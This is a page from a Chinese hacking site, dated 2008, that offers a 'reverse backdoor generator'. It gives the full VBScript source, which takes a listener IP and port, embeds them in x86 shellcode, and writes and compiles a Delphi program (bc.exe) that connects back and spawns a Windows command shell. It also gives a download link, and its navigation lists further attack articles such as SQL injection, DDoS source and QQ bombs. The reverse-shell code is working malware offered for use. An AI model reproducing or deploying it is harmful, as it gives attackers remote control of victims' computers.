·	完美空间提供500M免费AS	04-10	·	企业安全之YY内网准入以	04-09
·	企业安全之意识与策略	04-09	·	剑走偏锋:IIS漏洞利用	04-09
·	我来免费网提供100M免费	04-09	·	1122mb.com提供20G超大免	04-08
·	映像劫持与反劫持技术	04-07	·	让所有"暴力删除工具"无	04-07
·	入侵88red系统的详细过程	04-07	·	Sql Injection脚本注入终	04-07
·	vbs+delphi 反弹后门生成	04-07	·	飞讯网提供100MB免费PHP	04-07
·	突破SQL注入攻击时输入框	04-04	·	结合内核和病毒技术的最	04-04
·	Real Player rmoc3260.d	04-04	·	亿万网络今月最后为您提	04-04
·	php+mysql 5 sql inject	04-03	·	Real Player rmoc3260.d	04-03
·	oblog文件下载漏洞	04-03	·	免费啦提供1G-2G免费全能	04-03
·	完全解析网页后门和挂马	04-02	·	一句话开3389（只测试过	04-02
·	萧萧免费空间网提供100M	04-02	·	谷道免费空间网提供1G免	04-01
·	从本地入手解决双线路由	03-31	·	sablog 1.6 多个跨站漏洞	03-31
·	富文本编辑器的跨站脚本	03-31	·	Cookie注入是怎样产生的	03-31

[推荐]vbs+delphi 反弹后门生成器

荐 ★★★★★

vbs+delphi 反弹后门生成器

文章整理发布：黑客风云文章来源：www.05112.com 更新时间：2008-4-7 10:55:05

全部文件下载：http://www.icehack.org/attachment.aspx?attachmentid=56

vbs源码：

以下是引用片段：

'code by lcx
Dim WshShell, oExec,ip,port
ip= InputBox( "请输入监听ip的地址：", "输入", "192.168.8.200" )
port= InputBox( "请输入监听端口：", "输入", "53" )

re=Hex(port)
If Len(re)=2 Then re="00"&re
If Len(re)=3 Then re="0"&re
For i=0 To 3
c= Hex(Split(ip,".")(i))
If Len(c)<2 Then c=0&c
result=result&"#$"&c&","
Next
Set Fso=CreateObject("Scripting.FileSystemObject")
with Fso.opentextfile(left(Wscript.ScriptFullName,len(Wscript.ScriptFullName)-len(Wscript.ScriptName))&"\bc.dpr",2,true)
.writeline"program bc;"
.writeline"const"
.writeline" ShellCode:Array[0..286] of Char="
.writeline"("
.writeline"#$fc,#$6a,#$eb,#$4d,#$e8,#$f9,#$ff,#$ff,#$ff,#$60,#$8b,#$6c,#$24,#$24,#$8b,#$45,"
.writeline"#$3c,#$8b,#$7c,#$05,#$78,#$01,#$ef,#$8b,#$4f,#$18,#$8b,#$5f,#$20,#$01,#$eb,#$49,"
.writeline"#$8b,#$34,#$8b,#$01,#$ee,#$31,#$c0,#$99,#$ac,#$84,#$c0,#$74,#$07,#$c1,#$ca,#$0d,"
.writeline"#$01,#$c2,#$eb,#$f4,#$3b,#$54,#$24,#$28,#$75,#$e5,#$8b,#$5f,#$24,#$01,#$eb,#$66,"
.writeline"#$8b,#$0c,#$4b,#$8b,#$5f,#$1c,#$01,#$eb,#$03,#$2c,#$8b,#$89,#$6c,#$24,#$1c,#$61,"
.writeline"#$c3,#$31,#$db,#$64,#$8b,#$43,#$30,#$8b,#$40,#$0c,#$8b,#$70,#$1c,#$ad,#$8b,#$40,"
.writeline"#$08,#$5e,#$68,#$8e,#$4e,#$0e,#$ec,#$50,#$ff,#$d6,#$66,#$53,#$66,#$68,#$33,#$32,"
.writeline"#$68,#$77,#$73,#$32,#$5f,#$54,#$ff,#$d0,#$68,#$cb,#$ed,#$fc,#$3b,#$50,#$ff,#$d6,"
.writeline"#$5f,#$89,#$e5,#$66,#$81,#$ed,#$08,#$02,#$55,#$6a,#$02,#$ff,#$d0,#$68,#$d9,#$09,"
.writeline"#$f5,#$ad,#$57,#$ff,#$d6,#$53,#$53,#$53,#$53,#$43,#$53,#$43,#$53,#$ff,#$d0,#$68,"
.writeline result&"#$66,#$68,"&"#$"&Left(re,2)&","&"#$"&Right(re,2)&","&"#$66,#$53,#$89,#$e1,#$95,#$68,#$ec,#$f9,"
.writeline"#$aa,#$60,#$57,#$ff,#$d6,#$6a,#$10,#$51,#$55,#$ff,#$d0,#$66,#$6a,#$64,#$66,#$68,"
.writeline"#$63,#$6d,#$6a,#$50,#$59,#$29,#$cc,#$89,#$e7,#$6a,#$44,#$89,#$e2,#$31,#$c0,#$f3,"
.writeline"#$aa,#$95,#$89,#$fd,#$fe,#$42,#$2d,#$fe,#$42,#$2c,#$8d,#$7a,#$38,#$ab,#$ab,#$ab,"
.writeline"#$68,#$72,#$fe,#$b3,#$16,#$ff,#$75,#$28,#$ff,#$d6,#$5b,#$57,#$52,#$51,#$51,#$51,"
.writeline"#$6a,#$01,#$51,#$51,#$55,#$51,#$ff,#$d0,#$68,#$ad,#$d9,#$05,#$ce,#$53,#$ff,#$d6,"
.writeline"#$6a,#$ff,#$ff,#$37,#$ff,#$d0,#$68,#$e7,#$79,#$c6,#$79,#$ff,#$75,#$04,#$ff,#$d6,"
.writeline"#$ff,#$77,#$fc,#$ff,#$d0,#$68,#$f0,#$8a,#$04,#$5f,#$53,#$ff,#$d6,#$ff,#$d0"
.writeline");"
.writeline"begin"
.writeline" asm"
.writeline" lea eax,ShellCode"
.writeline" call eax"
.writeline" end;"
.writeline"end."
.close
end with
WScript.Sleep(100)
If Fso.FileExists(left(Wscript.ScriptFullName,len(Wscript.ScriptFullName)-len(Wscript.ScriptName))&"\bc.dpr") Then
Set WshShell = CreateObject("WScript.Shell")
Set oExec = WshShell.Exec("dcc32.dll bc.dpr")
Else
WScript.echo "bc.dpr还没有生成"
End If
msgbox "ok,生成了bc.exe"
Fso.DeleteFile "bc.dpr", True
Set Fso=Nothing

文章录入：cainiaowang 责任编辑：xinlian

下一篇文章：让所有"暴力删除工具"无语的代码

【字体：小大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

VIP 专区

利用BCB自己打造QQ炸弹	10-23
从内存中加载并启动一个exe(delp	09-27
开启和关闭Windows xp 防火墙(de	09-27
让你的程序通过XP防火墙(delphi编	09-27
如何让你的程序安全通过windows防	08-20
如何透过程序来控制 Windows (XP	08-20
动易2005-2006算号器的源代码	08-11
API对注册表进行操作(Delphi编程	07-30
一段隐藏注册表项的代码	07-26
了解VB编写病毒的大体方法	07-02
每秒4W的DDOS源码	06-08
从内存中加载并启动一个exe(Delp	06-05